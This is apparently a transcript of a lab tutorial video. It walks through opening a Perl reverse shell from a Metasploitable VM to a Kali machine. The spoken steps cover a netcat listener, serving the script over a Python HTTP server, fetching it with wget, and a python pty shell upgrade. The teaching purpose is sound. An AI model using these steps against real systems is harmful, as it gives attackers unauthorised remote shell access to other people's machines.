Greetings, I'm Professor K, and in this short video presentation, we're going to take a look at how we go about launching a reverse shell using the programming language Perl. This lab requirement, I will be using one installation of VirtualBox with the extension pack, one virtual install of Kali Linux, one virtual install of Metasploitable 2 or 3 running Ubuntu, and all my virtual adapters have been set to NAT network. To ensure that we do have a trouble-free lab experience, let's go ahead and discover our IP addresses for both our target and for our Kali. I've already logged on to my target machine, which is Metasploitable 3, the Ubuntu version. And at the prompt, I'm going to go ahead and type in ifconfig, hit enter. And I'm looking for the IP address for my Ethernet 0 adapter, and that is going to be 10.0.2.30. This is the IP address for my target. Your IP address may differ. To break out of the shell and have control of your mouse, just go ahead and hit the control key over on the right hand side of your keyboard, and that will release. Back at my Kali machine, I'm going to open up a fresh terminal, and at the prompt I'm going to type in ifconfig. Hit enter. And the IP address for my Ethernet 0 adapter on my Kali machine is 10.0.2.15. This is the IP address for my Kali machine. Your IP address may differ. Let's go ahead and close out our terminal, and let's open up a fresh terminal. The next thing we're going to do is ensure that we have connectivity between our Kali machine and our target. Now to do this, I'm going to type in ping and the IP address of my target. So I've typed in ping, give it a space, 10.0.2.30. I'll hit enter. Notice I have positive responses coming back from my target machine. And to break out of this sequence, I'm just going to press Control-C on my keyboard. Go ahead and close out your terminal. We're now ready to begin the lab. And as always, let's go ahead and create our working folder on our Kali desktop. To do this, I'm just going to right click anywhere on my Kali desktop, and from the context menu, I'm going to select Create Folder. I'm going to give my working folder a user-friendly name. I've called mine Shell Codes, but you are free to name your working folder as you see fit. Once you have your user-friendly name typed in for your folder, go ahead and click Create. Next, let's open up a browser. And once our browser opens up, in the address bar we can type in https://pentestmonkey.net/web-shells/Perl-reverse-shell. Once you have all that typed in correctly, just go ahead and hit enter. That's going to take you out to the download page for the Perl-reverse-shell script that we need to download. Underneath where it says download, you're going to see a link for Perl-reverse-shell. Go ahead and click on that. Next, you're going to save the file. Once your download has completed, go up to the top right of your browser and click on that download icon. From here, you're going to open up the download folder itself. And inside of the download folder, you're going to find that archive you just downloaded for the Perl-reverse-shell script. You're going to go ahead and right click on it. Let's do a cut. Let's click on desktop from the left window pane. Let's find our working folder and click anywhere inside of the right window pane, and from the context menu select paste. Inside of your working folder, find that downloaded archive, right click, and from the context menu, you're going to select Extract Here. You're now going to open up the directory for the Perl-reverse-shell script, and you're going to find the Perl-reverse-shell.pl. Find that file, go ahead and do a cut. Let's go back one level to our shell codes folder, and in the right window pane, right click and select Paste. You're now going to take that Perl script that we just pasted into our working folder. You're going to right click on it, and from the context menu, you're going to open up with mousepad. Inside the script, you're going to scroll on down to line 44 where it says where to send the reverse shell, change these. You're going to change the IP address to the IP address of your Kali machine. So inside of the field where it says $IP space equals, and you have a single quote, I'm going to type in the IP address of my Kali machine, which is 10.0.2.15. Just like that. I'm going to go ahead and leave the port number as it is 1234. Once I've done all that, I'm going to go up here and I'm going to close it out. And when prompted, I'm going to press the Save button. Go ahead and close out your working folder. Go ahead and close out your browser. Back at your Kali desktop, let's go ahead and open up a fresh terminal. And at the prompt, you're going to type in NC, give it a space, dash small letter V, give it a space, dash small letter N, give it a space, dash small letter L, give it a space, dash small letter P, give it a space, and the port number you want Netcat to be listing. This is the terminal that's going to catch our reverse shell when we launch it from our target. Once you have all that typed in correctly, go ahead and hit enter. Now we have a listener using Netcat established on our Kali machine. We next need to copy the script on over to the target. To do this, we will start a Python simple HTTP server inside of our working folder. To do this, I'm going to find my working folder. I'm going to right click, and from the context menu, I'm going to select Open Terminal here. To start this simple HTTP server using Python, I'm just going to type in Python3 space dash small letter M, give it a space, type in http.server, give it a space, and now I want the server to listen on port 80. Once I have all that typed in correctly, I'm just going to go ahead and hit enter. Do not close out this terminal. The HTTP server must be running to accept requests from our target machine. You can go ahead and minimize it, and you can also minimize your Netcat listener. Back on over on our target machine at the terminal, we're going to use the wget command to copy the file from our Kali machine on over to our target. So at the prompt, we're going to type in wget space http : the IP address of my Kali machine, which is 10.0.2.15. Give that a /. Now we're going to type in the name of the file that we want to copy on over to the target, which is Perl-reverse-shell.pl. Once you have everything typed in correctly, just go ahead and hit enter. And you'll notice that it returns to the prompt very quickly, letting you know that that command completed successfully. Our script got copied over to the root of our target machine. If you'd like to see the location, just go ahead and type in ls, hit enter, and you'll see that you now have a Perl-reverse-shell.pl script at the root of your target machine. We're now ready to establish that reverse shell from our target on over to our Kali machine. Back over on our Kali machine, we have our Netcat listener. We're now ready to establish that reverse shell between our target and that Netcat listener. Now to do this, we have to type in the name of the interpreter, and that is Perl. Now all you have to do is just type in the name of the script. Once you have everything typed in correctly, just go ahead and hit enter. Now back on over on our Kali machine. If we open up our Netcat listener, you'll see that we do have the reverse shell, and if I type in ID at the prompt, you will see that I'm currently logged on using the shell as a Vagrant, which is the user I am logged on as over on the target machine. And so that we can have a fully functional bash shell up inside of our reverse shell, we can use the following short Python script. So at the prompt, up inside of my reverse shell, I've typed in Python3, give it a space, -c, give it a space, single quote, import space, pty, semicolon, pty, period, spawn, open bracket, double quote, /bin, /bash, double quote, close the bracket, and you have to have this little dash right here at the end of the script or it won't work. So to ensure that you get a fully functional bash shell, make sure that you type in or you input this Python3 script correctly, and you have to have all the parts. Make sure you take some time to look around the Pen Test Monkey site. That is a great source for pen testing scripts and other tools. And so in this short video presentation, you got to see how we can use one of those scripts from Pen Test Monkey to establish a reverse shell using the programming language Perl. I'm Professor K. Thanks for watching, and I'll see you in my next video.